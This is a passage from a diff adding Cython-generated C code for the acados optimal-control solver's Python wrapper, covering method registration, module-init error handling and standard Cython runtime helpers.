(PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_set, __pyx_t_7) < 0) __PYX_ERR(0, 492, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_cost_set, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__75)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 551, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_cost_set, __pyx_t_7) < 0) __PYX_ERR(0, 551, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_constraint_2, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__76)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_constraints_set, __pyx_t_7) < 0) __PYX_ERR(0, 584, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_dynamics_g, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__78)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 619, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_dynamics_get, __pyx_t_7) < 0) __PYX_ERR(0, 619, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_options_se_2, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__80)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 641, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_options_set, __pyx_t_7) < 0) __PYX_ERR(0, 641, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___reduce_c, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__81)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_7) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___setstate, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__83)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_7) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":1 + * # -*- coding: future_fstrings -*- # <<<<<<<<<<<<<< + * # + * # Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + */ + __pyx_t_7 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_7) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init acados_template.acados_ocp_solver_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init acados_template.acados_ocp_solver_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* ArgTypeTest */ +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact) +{ + __Pyx_TypeName type_name; + __Pyx_TypeName obj_type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + else if (exact) { + #if PY_MAJOR_VERSION == 2 + if ((type == &PyBaseString_Type) && likely(__Pyx_PyBaseString_CheckExact(obj))) return 1; + #endif + } + else { + if (likely(__Pyx_TypeCheck(obj, type))) return 1; + } + type_name = __Pyx_PyType_GetName(type); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "Argument '%.200s' has incorrect type (expected " __Pyx_FMT_TYPENAME + ", got " __Pyx_FMT_TYPENAME ")", name, type_name, obj_type_name); + __Pyx_DECREF_TypeName(type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = 